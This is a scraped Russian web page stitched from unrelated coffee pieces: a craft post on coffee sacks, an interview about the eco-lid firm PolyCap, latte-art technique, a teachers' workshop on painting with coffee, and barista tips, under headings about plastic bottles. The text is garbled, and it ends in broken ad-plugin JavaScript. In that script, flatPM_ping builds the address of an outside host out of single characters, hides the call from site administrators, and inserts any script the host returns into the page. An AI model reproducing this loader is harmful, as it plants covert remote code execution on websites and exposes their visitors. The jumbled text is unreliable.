21 крутой вариант использования пластиковых бутылок на даче – Огород, сад, балкон – медиаплатформа МирТесен

21 крутой вариант использования пластиковых бутылок на даче - Огород, сад, балкон - медиаплатформа МирТесен Кофе

Подушки, стулья и сумки из кофейных мешков | блог о кофе – сергей реминный. все, что вы хотите знать о кофе

     Попались на глаза несколько подборок разнообразных творений, которые люди делали из кофейных мешков.

     Но на самом деле мешки совсем не дороги, а для дизайна выглядят очень даже стильно.

     Я не раз замечал один интересный нюанс.

     В этих странах мешки для кофе в виде декора можно увидеть в основном только на стенах торговых залов кофейных компаний

                                          … где-нибудь в Коста-Рике…

                                           …или на Гавайях…

     А у нас, как я уже сказал выше, это вывешивают как экзотику…

     Но творческого подхода никто не отменял, вот некоторые креативные дизайнеры и делают такие, например, замечательные подушечки для дома:

     … или оббивку стульев для офиса…

     А некоторые американские домохозяйки даже делают себе из джутовых мешков модные спортивные сумки

by Сергей Реминный. Кофейный эксперт. Блог о кофе

Вам – крышка! как заработать на экологичных крышечках для кофейных стаканов

Однажды Пётр Кабин увидел в ассортименте одной из западных компаний экологичные бумажные крышечки для кофейных одноразовых стаканов – и загорелся идеей выпускать что-то подобное для российского рынка. Несмотря на то, что стоимость эко-крышек оказалась выше цены на пластиковую продукцию, многие кофейни заинтересовались ими, и компания Петра «ПолиКап» сейчас продаёт свои крышки уже в 66 городах. О том, как заработать на экологичных крышечках для одноразовой посуды, Пётр Кабин рассказал порталу coffee-about.ru.

Петр Кабин

Как всё начиналось

К моменту открытия собственного бизнеса Пётр Кабин около трёх лет работал в b2b-компании, поставлявшей сырьё для различных видов бумажной упаковки. Почти 80% продаж составлял экспорт – более чем в 60 стран мира. Среди покупателей были зарубежные предприятия, выпускающие разнообразную продукцию, в основе которой – бумага и пластик. В ассортименте одного из предприятий Пётр впервые увидел бумажные крышки для одноразовых стаканчиков. Они позиционировались как экологичная альтернатива пластику. 

Правда, при ближайшем рассмотрении оказалось, что эти крышки далеко не идеальны. Они размокали при использовании, давали привкус напитку и плохо закрывали стакан. Но сама идея Петру понравилась. Оставалось только понять, как сделать продукт более качественным. 

«В бумажных крышках я увидел глобальную историю, так как пластиковые крышки – это огромный объём мусора, который не разлагается. Одна кофейня в год собирает полтонны пластика», – говорит Пётр Кабин.

ПолиКап 

Для производства биоразлагаемых крышек он выбрал предприятие в Китае. Оно специализируется на очень тонкой упаковке для премиум-сегмента. Пётр стал сотрудничать с этим заводом после посещения нескольких китайских фабрик, отдав ему предпочтение за высокое качество продукции. 

Быстрый старт и первый клиент

В январе 2020 года была изготовлена тестовая партия в 100 000 крышек для компании Петра, которую он назвал «ПолиКап». Первым клиентом стартапа стало московское кафе «Груша». Предприниматель вышел на владельцев через общих знакомых. Собственникам «Груши» понравилась идея биоразлагаемых крышек, и они купили часть тестовой партии. 

«Дальше я открыл список самых модных кофеен и просто написал им по электронной почте. Был очень хороший отклик. В результате мы за неделю распродали всю тестовую партию. Правда, прибыли у нас не было. Так как партия небольшая, её себестоимость была довольно высокой. А цену мы установили без накруток, чтобы выйти в ноль», – рассказывает Пётр Кабин.

ПолиКап 

Первый успех показал, что идея бумажных крышечек вполне понятна рынку. В начале 2020 года основатель проекта «ПолиКап» запустил в производство крупную партию и начал выстраивать компанию. По мнению Петра, бизнес должен с самого первого дня быть правильно организован, отлажен и автоматизирован. Опыт работы в найме позволял ему оптимально выстроить все процессы. 

«Я работал в крупных компаниях и знаю их сильные стороны, которые позволяют им быть успешными. При запуске своего проекта я ориентировался на их подход. Изначально структура компании и бизнес-процессы были построены на том, что мы будем идти вперёд и постоянно расти», – говорит Пётр. 

Общая сумма вложений в запуск проекта «ПолиКап» составила примерно 100 000 долларов, это были личные средства основателя компании. Первоначальные инвестиции потребовались на создание IT-инфраструктуры, аренду офиса в Москве, автоматизацию процессов, а также закупку сырья. Эти инвестиции Пётр планирует окупить в течение года. 

«Привлечение новых инвесторов и партнёров мы сейчас не рассматриваем. Сейчас компания полностью принадлежит мне, и у нас единоличное принятие решений. Плюс такого подхода в том, что мы можем двигаться быстро, не тратя время на различные согласования и утверждения. Это тоже влияет на результат», – замечает предприниматель. 

Из чего делают крышечки

Крышечки компании «ПолиКап» делают из багассы – это отходы переработки сахарного тростника, из которых изготавливают специальную целлюлозу. Основной объём сырья закупают во Вьетнаме и Иране. По словам Петра, этот материал отличается от более традиционных своими свойствами и экологичностью. Целлюлоза из багассы биоразлагаема, её можно повторно перерабатывать. Важно и то, что материал долго не размокает и хорошо держит тепло. 

Сырьё приходит на предприятие в Китай в виде пластов. Их помещают в гидросбиватель (водную ванну), где они превращаются в кашицу. Далее её заливают в формы и прессуют. Каждая крышечка проходит видеоконтроль качества, после чего отправляется на упаковочную линию. В зависимости от объёма на выпуск одной партии требуется 10-15 дней.

ПолиКап 

Важным шагом в развитии проекта стало прохождение российской экологической сертификации, которое заняло около двух месяцев. Исследования стоили несколько тысяч долларов. В мае 2020 года продукции компании был присвоен код PAP21 – это означает, что крышечки можно отдавать в переработку. 

В конце августа компания прошла ещё одну сертификацию – европейскую. Она подтверждает, что крышки полностью разлагаются в земле за 90 дней. Получение сертификата заняло около шести месяцев и стоило примерно 5 тысяч долларов. 

Пандемия затормозила, но не сломила

После полноценного запуска в январе 2020 года количество клиентов у компании «ПолиКап» довольно быстро росло. Правда, рост затормозился из-за эпидемии коронавируса. Многие кафе закрылись, плюс очередная партия продукции прибыла из Китая позже, чем планировалось. Тем не менее, продажи после введения режима самоизоляции не остановились. 

«Я человек оптимистичный, всегда стараюсь двигаться вперед. Это было в какой-то степени сумасшествие – запуститься в пандемию с дорогим продуктом. Но сегодняшние результаты говорят, что мы были правы», – говорит Пётр.

ПолиКап 

По словам Петра, начиная с мая продажи удваиваются каждые два месяца. К июлю продукцию компании покупали 34 кофейни в восьми городах. А сейчас у «ПолиКапа» более 220 кофеен-партнёров в 66 городах России. 

«Я считаю это хорошим показателем. Из-за пандемии мы стартовали чуть медленнее, чем планировали. Но это позволило команде ещё лучше отточить все процессы и сплотиться. Когда в сентябре-октябре продажи сильно выросли, мы смогли спокойно покрыть весь объём работ нашей небольшой командой. Так что пандемия не нарушила нам глобальных планов – просто чуть-чуть сместились сроки», – говорит Пётр. 

Ответственная аудитория

Основные клиенты компании «ПолиКап» на данный момент – небольшие кофейни. Как показала практика, именно они наиболее быстро и охотно внедряют изменения и новинки. Крупный бизнес только начинает проявлять интерес к экологичной продукции. 

Около 70% продаж проекта приходятся на кофейни-партнёры за пределами Москвы и Санкт-Петербурга, и их доля продолжает расти. По словам Петра Кабина, обычно это знаковые кофейни в своих городах, за которыми потом подтягиваются остальные.

ПолиКап 

«Мы рады тому, что у нас много небольших клиентов. Считаю, это очень сильная бизнес-модель – мы не зависим от одного-двух крупных заказчиков. К нам приходят большие игроки, видя, как много маленьких компаний используют нашу продукцию. Но при этом они уже не могут зайти с позиции силы, выжимая нас по цене. Наш объём небольших клиентов создаёт принципиально другой баланс сил во время переговоров с крупными компаниями», – рассказывает Пётр. 

Экономика проекта

Сейчас компания производит два вида крышек разного размера – для стаканчиков объёмом 250, 350 и 450 мл. Средняя оптовая цена крышки от «ПолиКап» – 3,5 рубля. Она может быть и ниже, если речь идёт о больших заказах. 

По словам Петра, аналогичную продукцию можно найти у конкурентов по цене от 5 до 8 рублей за штуку. Собственное преимущество в цене предприниматель объясняет технологиями изготовления, отработанными бизнес-процессами и низкой наценкой. Важно и то, что «ПолиКап» работает без дистрибьюторов, поставляя товар напрямую клиенту. 

«Наша маржинальность – около 5%. Мы специально держим её на низком уровне, чтобы как можно шире охватить рынок и увеличить объёмы. Несмотря на сильное падение курса рубля этим летом, мы не поднимали цены, чтобы клиентам было проще выбирать наш продукт. Мы стремимся, чтобы наши крышечки были не в десяти кофейнях внутри Бульварного кольца, а по всей стране», – рассуждает Пётр. 

Петр Кабин

Минимальный заказ – одна коробка, в которой тысяча крышек. Но средний заказ состоит обычно из трёх коробок. Клиенты из Москвы и Санкт-Петербурга получают продукцию на следующий день после оформления заявки. Длительность доставки в другие города зависит от оперативности транспортных компаний, которые привлекаются для этого. 

Предлагаем ознакомиться:  Настройка эспрессо - баланс вкуса

Несмотря на низкую маржинальность, компания уже на третьем месяце своей деятельности вышла в операционный ноль. Сейчас проект приносит небольшую прибыль, которая реинвестируется в развитие команды, инфраструктуру, закупку сырья. 

Рынок и конкуренция

Основными своими конкурентами Пётр Кабин считает пластиковые крышки. Они стоят не более 1,5 рублей: это на 2 рубля дешевле, чем крышки от «ПолиКап». Поэтому главная задача компании в продвижении – объяснить потенциальным клиентам экологичность и другие преимущества своей продукции по сравнению с пластиком.

«Наши менеджеры по продажам – выходцы из кофейно-ресторанной индустрии. Они говорят на одном языке с клиентами, понимают их потребности и могут объяснить им все преимущества наших крышечек с точки зрения кофейни. Помогает и то, что большинство владельцев и управляющих кофеен – люди прогрессивные и образованные. Они тоже понимают, что крышечки – это на самом деле вклад в решение глобальных экологических задач», – констатирует Пётр.

ПолиКап 

Другой конкурирующий продукт – крышки из биоразлагаемого пластика. Этот материал делают из кукурузного крахмала, соломы и опилок. Но такую продукцию, по мнению предпринимателя, вряд ли можно назвать экологичной. Срок её разложения – примерно 400 лет. 

«Я уверен, что рынок бумажных крышек будет расти, появятся новые игроки. Но за счёт нашего опыта, в том числе по импорту и контрактному производству, мы можем предлагать самые низкие цены, которые только возможны», – убеждён Пётр. 

Продвижение без поддержки экологов

Для поиска клиентов «ПолиКап» использует различные инструменты онлайн-продвижения. Основные из них – таргетированная и контекстная реклама, а также продвижение в соцсетях. Активно ведётся аккаунт проекта в Instagram, где можно следить за развитием компании и её продуктов. 

«Посетители кофеен нередко публикуют фото в Instagram с нашими крышечками. В Instagram кофеен на таких фото отмечают нас», – говорит Пётр. 

Один из способов продвижения нового экологичного продукта – получить поддержку «лидеров мнений» в сфере экологии. Но здесь всё оказалось не так просто. Выяснилось, что далеко не все из экологов поддерживают инициативу с биоразлагаемыми крышечками. Некоторые из них считают, что любая одноразовая посуда в принципе неэкологична, поэтому пользоваться нужно только многоразовыми ёмкостями.

ПолиКап 

«У меня на этот счёт другое мнение – считаю, что перспектив у многоразовой «тары с собой» немного. Даже на Западе доля её использования не превышает 1-2%. Дело в том, что работающему человеку таскать её весь день с собой просто неудобно. А любые благие начинания, лишающие человека удобств, обречены на провал. Мы предлагаем менять городскую среду постепенно, не отнимая у человека удобств, к которым он привык», – говорит Пётр. 

Минимум штата, максимум аутсорса

Сейчас в штате компании всего три человека – это менеджеры по продажам. Вопросы складирования, хранения и импорта отданы на аутсорс двум компаниям. Отдельная компания занимается бухгалтерией и юридическими вопросами. Также на аутсорсе – специалисты по интернет-маркетингу, пиару, SMM. Всего «ПолиКап» сотрудничает с более чем 30 «сторонними» специалистами. 

«При открытии компании я понимал: большинство процессов можно и нужно отдавать на аутсорс. Наши партнёры-аутсорсеры – известные игроки на рынке. За счет выбора таких партнёров мы можем быстро и бесперебойно расти», – признаёт Пётр Кабин. 

Что дальше

Одно из приоритетных направлений компании «ПолиКап» на ближайшие месяцы – развитие экспорта. По словам Петра, с 2021 года в Европейском Союзе вводят запрет на использование одноразовой пластиковой упаковки и сложной упаковки. Предприниматель рассчитывает, что это ещё больше увеличит спрос на его продукцию со стороны европейских клиентов. 

ПолиКап

Ближайшая цель компании – расширение ассортимента. Сейчас ведутся переговоры о запуске производства одноразовых стаканчиков, которые не будут содержать никаких видов пластика. Этот продукт планируется выводить как на российский рынок, так и на экспорт. Старт производства намечен на начало 2021 года, предприятие будет находиться в России. 

Также в планах – выпуск экологичных трубочек без содержания пластика и клея. В качестве сырья для этих двух продуктов будет использоваться уникальный картон, который производится только на одном заводе в мире. 

«Мы считаем, что улучшение экологической ситуации – важный вопрос для каждого. Небольшие кофейни тоже могут внести свой вклад в общее дело, поменяв пластиковую крышку на бумажную. Считаю, что наше общество видит эту проблему и адекватно на неё реагирует. Выбор кофеен в десятках городов, где используют наши биоразлагаемые крышечки, это подтверждает», – замечает Пётр Кабин.

Пётр Кабин

Чтобы не пропустить интересную и полезную для вас статью о малом бизнесе, подпишитесь на наш Telegram-каналстраницу в Facebook и канал на «Яндекс.Дзен».
biz360

История появления

Латте-арт появился на родине эспрессо Италии в 80-х годах прошлого века. История не сохранила имя первого бариста, которому пришла в голову идея украсить кофе затейливым рисунком, но мода на своеобразное искусство распространилась далеко за пределами страны.

В США технику популяризировал Дэвид Шомер, владелец кафе Espresso Vivace в городе Сиэтле, штат Вашингтон. Толчком послужила фотография из Италии, на которой была чашка эспрессо с рисунком папоротника. Шомер создал свою школу обучения бариста различным приемам создания изображений с помощью молока и кофейной пенки.

Уже к 2000-м годам латте-арт стал популярен по всей Европе, а затем распространился и в Юго-Восточной Азии, где усовершенствовали технику, придав ей новые краски. Один из самых известных мастеров – корейский бариста Ли Кан Бин, создающий на кофе картины художников-классиков, изображения героев диснеевских мультфильмов и портреты посетителей кофейни.

Увлечение латте-арт связывают с ростом общей осведомленности потребителей о кофе. Красиво оформленный напиток свидетельствует о профессионализме бариста и его внимании к клиенту.

Дополнительным толчком к развитию искусства послужило широкое распространение социальных сетей. Ролики призеров всемирного чемпионата по латте-арт собирают миллионы просмотров на общедоступных видеосервисах.

фото видов рисунков латте-арт

Как делать рисунки на кофе

Какую бы технику рисования ни выбрал мастер, он первым делом готовит бодрящий качественный эспрессо или капучино в кофемашине. Напиток наливается в чашку или стакан (кому как нравится) и посыпается сверху шоколадом, какао-порошком либо корицей. Благодаря этим ингредиентам рисунок получится особенно интересным, выразительным.

Затем готовят молочную пенку. Лучше всего для этой цели подходят сливки (жирностью 30 процентов) или молоко (процент жирности не менее 3-3,5). Технология приготовления пенки предусматривает использование охлажденного продукта, который затем разогревается до необходимой температуры и одновременно с этим взбивается под давлением.

Процесс взбивания, по мнению специалистов, не должен быть слишком продолжительным, ведь его цель — добиться степени легкого загустения продукта. Для упрощения задачи в дополнение к кофемашинам предусмотрен специальный кувшинчик для молока (питчер), пользуются им так:

  • наполняют питчер молоком чуть ниже основания его носика;
  • паровой кран кофемашины опускают в питчер так, чтобы отверстия наконечника находились на сантиметр-полтора ниже уровня молока;
  • паровой кран кофемашины открывают;
  • молоко будет увеличиваться в объеме, поэтому, чтобы сохранять дистанцию в полтора сантиметра, наконечник крана нужно будет тоже поднимать вверх, продолжительность взбивания составляет в разных кофемашинах от 5 до 15 секунд;
  • столько же времени потребуется для процедуры, которая называется пропариванием молока – наконечник погружают вглубь питчера, а 1-1,5 см теперь отделяют его от дна, а не от поверхности (кувшинчик придется слегка наклонить, чтобы в нем активнее шли вихревые процессы);
  • через 5-15 мин. паровой кран закрывают, молоко к этому моменту прогревается до температуры 65-70 градусов;
  • можно начинать рисовать на кофейной поверхности узоры, воспользовавшись носиком питчера, как «карандашом».

Для новичка это будет довольно сложно сделать, а вот опытные бариста способны добиваться необходимого результата разными способами:

  • располагая питчер на разной высоте от чашки (меняя таким образом силу струи);
  • регулируя скорость струи;
  • выбирая на кофейной поверхности различные точки и направляя в них струю.

Для нанесения узоров используют различные тонкие и острые палочки типа зубочисток. Их опускают в кофе на нужную глубину, а затем поднимают, захватывая немножко кофе и вынося на белоснежную поверхность, и наносят на нее легкий темный штрих, геометрические линии, зигзаги, овалы, цветы.

Для создания оригинальных кофейных картин подойдет также кондитерский шприц с тонкой насадкой, его заполняют жидким шоколадом или густым сиропом (карамельным, клубничным, шоколадным) и создают узоры непосредственно поверх молочной пенки.

Если идеальная картинка не получается, для начала лучше освоить более простой способ рисования – с помощью трафарета, купив готовый или вырезав его самостоятельно из картона. Трафареты должны быть диаметром чуть шире, чем чашка или кружка, а вот рисунок не должен выходить за ее пределы.

Если вы делаете трафарет самостоятельно, постарайтесь, чтобы прорези не были слишком толстыми – тогда изображение получится более изящным. Трафарет помещают над чашкой, поверхность которой покрыта молочной пенкой, и насыпают на него тертый шоколад, корицу, молотые орехи. На темной поверхности эспрессо будет интересно смотреться изображение из сахарной пудры – например, лебедь, зайчик, олень.

Мастер-класс для педагогов «рисование кофейным раствором»

анна новикова

Мастер-класс для педагогов «Рисование кофейным раствором»

Тема моего мастер-класса –«Нетрадиционные техники рисования»

, и я начну со слов В. А.Сухомлинского:

«Чем больше мастерства в детской руке, тем умнее ребенок».

дети очень любят рисовать, но порой им становится скучно, утомительно и неинтересно. Пока они маленькие, родители рисуют с ними красками, фломастерами, карандашами. А когда подрастают, приходят в школу – опять тот же самый набор художественных материалов. Скучно.

Так постепенно интерес к рисованию проходит.

Что же делать для того, чтобы интерес детей к творчеству не угасал?

Предлагаем ознакомиться:  Капучино, латте и гляссе, меню и цены

Для этого на занятиях по рисованию я применяю нетрадиционные техники рисования,, тем самым, вызывая стремление заниматься таким интересным делом.

Оригинальное рисование раскрывает творческие способности, позволяет почувствовать различные художественные материалы, их характер и настроение.

Нетрадиционных техник очень много, и многие из них, и вы, и я часто применяем в своей работе с детьми.

Но сегодня я хочу познакомить вас с еще одним видом нетрадиционного рисования. А чем мы будем рисовать,вы сможете определить по следующей загадке:

Я проснулся утром рано и налил американо.

На обед, читая прессу, заказал себе эспрессо,

А потом нашел причину выпить чашку капучино.

А под вечер я, ребята, выпил латте макиато.

Так ответьте мне, друзья, что в итоге выпил я?

(кофе)

Тема моего мастер-класса«Чудеса из кофейной чашки»

и я хочу вас сегодня познакомить с нетрадиционной техникойрисования кофейным раствором.рисунки, созданные в этой технике называют живопись цвета осени.

Работы получаются очень спокойные и теплые.

Рисовать кофе так же как рисуют акварельными красками – ещё одно из «открытий»

современных художников. Этим открытием я и воспользовалась, и попробовала свои силы и умения в этом направлении.

Я покажу вам работы, выполненные в этой технике.

(мои работы)

А вот эта картина-«красные маки»

целиком выполнена детскими руками.

Кофейный пигмент наносится на бумагу с помощью обыкновенной художественной кисти либо губки-которой моют посуду.

Растворимый кофе идеально подходит для создания рисунков в однотонной теплой цветовой гамме. Чем насыщеннее раствор, тем ярче тон.

Оригинальность и привлекательность этой техники рисования в том, что я показала детям необычное применение обычного напитка для художественного творчества.

сам материал экологичен, рисунки получаются теплыми и естественными, привлекая детей своим бодрящим ароматом.

Для рисования можно использовать и очень крепко заваренный молотый кофе, растворимый молотый кофе в гранулах. Именно растворимый кофе позволяет получить насыщенный, почти чёрный тон.

И это позволяет делать рисунки контрастными, от самых светлых оттенков до глубоких тёмных акцентов.

Марка кофе не принципиальна, однако я использую те сорта, которые нравятся на вкус и запах.

Практическая часть мастер-класса:

Итак. Приступаем.

Сейчас мы нарисуем с вами небольшой пейжажик.

Нам понадобится лист плотный лист бумаги, кисточки-тонкая для прорисовки мелких деталей, поролон либо широкая кисть для фона., кофе,сахар. Берем поролон и кофейным раствором наносим тон. Затем уголком губки наносим отрывистыми движениями мазки насыщенным раствором-это получаются кусты.

Для того чтобы прорисовать тонкие травинки нужно либо дождаться полного высыхания и прорисовать их тонкими кисточками, либо по влажному фону с нанесенным кофейным пигментом –делать штрихи разной длины с помощью зубочистки.

Для прорисовывания мелкой травы кисточкой, кисточку мы держим не как карандаш или ручку, а более свободно, немного дальше от рисующего края, чем при письме.

Ваниль, цикорий, корица, чай, чай- каркаде. куркума, сахар. Да, всё это и многое другое можно использовать в кофейном рисовании.

Чтобы создать эффект снежинок, Берём щепотку сахарных крупинок и посыпаем влажный фон. Вроде бы ничего не происходит, но нужно просто подождать, подумать о хорошем, и вы увидите. звёздочки и крапинки! Волшебство!

Главный секрет в получении этих снежинок- угадать с влажностью бумаги.

Нужна удачная степень влажности листа, с опытом у всех получится её почувствовать. Если фон суховат, звёздочек уже не будет. Просто сахаринки прилипнут и соберут вокруг себя немного цвета. Средняя степень влаги — звёздочки и снежинки. Избыточная мокрота — сахар растает, и образуются «кофейные сиропчики» — места, которые плохо высыхают и липнут.

Работы получаются очень теплыми, душевными и ароматными.

что чем гуще кофе, тем насыщеннее получается оттенок и чем больше слоев нанести после высыхания первого слоя – тем более ярким и переливающимся получается рисунок.

Также я пробовала рисовать цикорием – рисунки и тонирование листа цикорием дает некий блеск в работе – они как будто переливаются. И еще – при тонировании листа и рисовании кофе лучше выбирать бумагу более плотной фактуры.

Творческий процесс – это настоящее чудо. Я желаю вам как можно чаще использовать нетрадиционные техники рисования в своей практике и понаблюдать, как дети раскрывают свои уникальные способности, как они радуются.

Здесь они начинают чувствовать пользу творчества и верят, что ошибки – это всего лишь шаги к достижению цели, а не препятствие, как в творчестве, так и во всех аспектах жизни.

Я хочу поблагодарить вас за активное участие в мастер-классе и в память о нашей сегодняшней встрече хочу подарить вам буклеты по использованию нетрадиционных техник рисования.

Мастер-класс от настоящего «barista»

Кофе — особенный и капризный напиток, только при соблюдении определенных инструкций можно приготовить что-то стоящее, правила также понадобятся при сотворении рисунка.

Латте- арт, хоть и требует знаний и навыков, но также является творческим занятием и требует постоянных тренировок и практик. В этом деле не помешает иметь наставника, и поэтому мы собрали несколько неожиданных советов и интересных открытий:

  1. Практически все кофейные напитки готовятся на основе эспрессо. Пропорция его невелика: около 30-50мл. Разнообразить вкус возможно при помощи добавления молока, сиропов, пряностей, сахара, соли или перца. Но чтобы получить действительно хороший напиток, необходимо позаботиться о качестве основы.

    21 крутой вариант использования пластиковых бутылок на даче - Огород, сад, балкон - медиаплатформа МирТесен

  2. Для того чтобы создать трехмерные изображения в вашей чашке необходимо создать более густую пену.
  3. Использование френч-пресса позволит сохранить наибольшее количество кофеина, чем если бы мы пользовались другими способами заварки.
  4. Питчер используем так, чтобы из него одновременно выливались как молоко, так и пена. Только в этом случае рисунок получится удачным.

    21 крутой вариант использования пластиковых бутылок на даче - Огород, сад, балкон - медиаплатформа МирТесен

  5. Кофе, сваренный в кофеварке, уже имеет пенку, поэтому в итоге перемешанная масса будет иметь нежный бежевый цвет.
  6. Чем выше жирность молока, тем более сливочным на вкус будет напиток.
  7. Качество воды также сильно влияет на вкус напитка, не стоит использовать жесткую воду из-под крана, это может изменить вкус кофе в худшую сторону или полностью уничтожить его.

Необычные рисунки на пенке лучших в мире бариста

В последние 10 лет латте-арт является ведущей тенденцией кофейной индустрии. Им интересуются профессиональные бариста, которые создают шедевры. Например, итальянский художник Дж. Фиорини изображает реалистичные образы птиц и животных, демонстрируя глубокие анатомические познания. А южнокорейский мастер Ли Кан Бин с помощью молочной пены воспроизводит миниатюрные копии картин художников по фото.

Необычные рисунки
Кофе-арт — это возможность проявить фантазию.

Многие бариста декорируют кофе изображениями людей с хорошо прорисованными чертами лица и одеждой.

Поделки из бумажных стаканчиков своими руками: подборка фото

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement(“div”)),n=(d.exec(e)||[“”,””])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1] e.replace(o,”<$1>”) n[2],r=n[0];r–;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector(‘[data-flat-script-id=”‘ t 